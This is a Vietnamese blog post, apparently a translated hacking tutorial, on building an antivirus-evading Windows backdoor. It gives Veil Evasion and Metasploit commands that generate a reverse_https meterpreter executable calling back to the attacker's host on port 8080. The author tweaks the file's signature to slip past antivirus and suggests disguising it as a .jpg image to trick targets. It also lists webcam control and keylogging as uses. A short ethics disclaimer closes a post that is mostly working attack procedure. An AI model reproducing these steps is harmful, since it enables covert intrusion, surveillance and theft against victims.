Cách tôi tạo một Backdoor không thể phát hiện cho Windows - Đạo đức Hacking

Mar 22 2022
Backdoor là gì? Backdoor là một phương pháp bí mật đạt được quyền truy cập từ xa vào máy tính bằng cách vượt qua xác thực thông thường và tường lửa của máy. Trong blog này, tôi sẽ viết về Cách tôi tạo một cửa sau cho máy Windows của mình mà ngay cả phần mềm chống vi-rút cũng không thể phát hiện được.

Backdoor là gì?

Backdoor là một phương pháp bí mật đạt được quyền truy cập từ xa vào máy tính bằng cách vượt qua xác thực thông thường và tường lửa của máy.

Trong blog này, tôi sẽ viết về Cách tôi tạo một cửa sau cho máy Windows của mình mà ngay cả phần mềm chống vi-rút cũng không thể phát hiện được. Sau khi tạo backdoor, tôi đã có thể thực hiện nhiều việc trên máy Windows từ xa như điều khiển webcam, chụp ảnh màn hình, sử dụng keylogger, v.v. Hãy bắt đầu.

Tôi đã tạo tệp thực thi (tệp .exe) trên của tôi Ubuntu machine. Tệp này .exe, khi chạy trên máy windows, đã tạo một cửa sau cho máy Ubuntu của tôi từ đó tôi có thể kiểm soát mọi thứ trên máy windows.

Chúng ta hãy xem xét các bước cần phải được làm theo.

1. Cài đặt Veil

Bước đầu tiên, chúng ta cần cài đặt Veil. Để cài đặt Veil, bạn có thể vào liên kết nàyhttps://www.javatpoint.com/installing-veil. Nó cũng sẽ yêu cầu cài đặt metasploitable-framework cho người dùng ubuntu (không bắt buộc đối với Kali). Bạn có thể tải xuống từ đây:https://www.darkoperator.com/installing-metasploit-in-ubunt.

Sau khi cài đặt, bạn có thể bắt đầu chỉ bằng cách gõ veil. (hoặc bạn có thể thực thi nó bằng cách gõ ./Veil.pyvào thư mục veilđược cài đặt). Vỏ mạng sẽ mở ra như hình dưới đây:

2. Sử dụng Evasion in Veil

Khung màn hình có 2 công cụ ( EvasionOrdinance) có thể được nhìn thấy bằng cách gõ danh sách vào vỏ màn hình. Chúng tôi quan tâm đến Evasion, vì vậy chúng tôi nhập

> use 1

      
                

Trong backdoor, một kết nối ngược được tạo ra, tức là khi người nhắm mục tiêu nhấp đúp vào tập lệnh, máy tính của họ sẽ bắt đầu khởi tạo backdoor. Vì vậy, nó trở nên không thể phát hiện được bởi nhiều phần mềm chống vi-rút vì không có máy bên ngoài yêu cầu kết nối. Tôi cũng đã sử dụng cổng 8080là một cổng phổ biến được sử dụng để kết nối với các trang web, vì vậy sẽ không có gì đáng ngờ đối với phần mềm chống vi-rút.

Gõ phím :

> list

      
                

> use 15

      
                

Để đặt LHOST và LPORT chạy:

> set LHOST <your_IP>
> set LPORT 8080

      
                

Chúng tôi nên cố gắng sửa đổi tệp và làm cho tệp độc đáo hơn để nó vượt qua phần mềm chống vi-rút. Không có lý do thực sự mà tôi đã viết 2 dòng tiếp theo. Nó chỉ là để làm cho chữ ký khác đi một chút để qua mặt phần mềm chống vi-rút.

Nhập tiếp theo generateđể tạo tệp. Một lời nhắc sẽ xuất hiện để đặt tên cho cửa hậu. Tôi đã đặt tên cho nó backdoor_8080nhưng bạn có thể đặt tên nó hơi khác để không gây nghi ngờ.

Một trang sẽ xuất hiện cho bạn biết vị trí của tệp thực thi đã lưu.

Chúc mừng!!! cửa hậu được tạo ra. Nó được lưu trữ tại:var/lib/veil/output/compiled/backdoor_8080.exe

4. Nghe các kết nối đến trên cổng

Trong khi tạo cổng, tôi đã sử dụng cổng 8080. Vì vậy, tôi sẽ mở cổng trên máy ubuntu của mình để nó sẵn sàng kết nối khi máy tính đích chạy tệp thực thi. Để làm điều này, tôi sử dụng khuôn khổ Metasploit. Để chạy bảng điều khiển Metasploit, hãy chạymsfconsole

$ msfconsole

      
                

Để mở cổng, tôi đã sử dụng một mô-đun do Metasploit cung cấp. Nó được gọi là multi/handler. Vì vậy, tôi chạy,

> use exploit/multi/handler

      
                

Chúng tôi sẽ thay đổi các cài đặt này cho phù hợp với yêu cầu của chúng tôi. Chạy các lệnh sau:

> set PAYLAOD windows/meterpreter/reverse_https
> set LHOST <IP>
> set LPORT 8080
> show options

Nhập exploitđể bắt đầu nghe trên cổng

> exploit

      
                

Có nhiều cách kỹ thuật xã hội khác nhau để cung cấp backdoor tới một máy tính mục tiêu. Một cách như vậy được mô tả trong blog dưới đây, nơi tôi đã viết cách tạo trojan. Về cơ bản, nó ngụy trang .exetệp trong một hình ảnh trong một .jpgtệp.

6. Kiểm tra backdoor trên Windows

Nhấp đúp vào backdoor_8080.exetệp trong máy Windows đã thực thi tệp thực thi của tôi.

Trong Metasploit nơi chúng tôi đang lắng nghe các kết nối trong máy ubuntu, chúng tôi có thể thấy trình bao metepreter đã được mở.

Vỏ đồng hồ đo sẽ giống như hình trên. Bạn có thể nhập helpđể nhận một danh sách dài các lệnh và mô tả của chúng về những gì bạn có thể làm.

Danh sách các lệnh cơ bản mà bạn có thể chạy là

> sysinfo
> ipconfig
> pwd
> shell

Nếu bạn thích blog của tôi cho đến nay, bạn có thể Mua cho Tôi Cà phê bằng cách nhấp vào nút bên dưới hoặc theo liên kết sau:https://www.buymeacoffee.com/gouravdhar

Tóm tắt Backdoor

Mặc dù có vẻ như việc tạo backdoor là điều sai trái và chỉ được thực hiện bởi các hacker blackhat, nhưng điều đó không hoàn toàn đúng. Một số công ty dựa trên sản phẩm cũng tạo cửa hậu vào sản phẩm của họ để nếu người dùng của họ mất quyền truy cập vào tài khoản hoặc sản phẩm của họ, công ty có thể giúp họ có quyền truy cập. Mặc dù phương pháp trên là một cách tốt để tạo các cửa hậu, nhưng nếu bạn muốn tuân theo khía cạnh đạo đức, đừng sử dụng nó để truy cập vào các máy tính mà bạn không được phép.

Để nhận được thông tin cập nhật về các chủ đề thú vị hơn, hãy theo dõi tôi tại đây . Hãy bình luận và chia sẻ kinh nghiệm và suy nghĩ của bạn. Đừng quên kiểm tra trang web của tôi tại https://gourav-dhar.com để biết thêm các blog liên quan đến công nghệ.

© Copyright 2021 - 2023 | vngogo.com | All Rights Reserved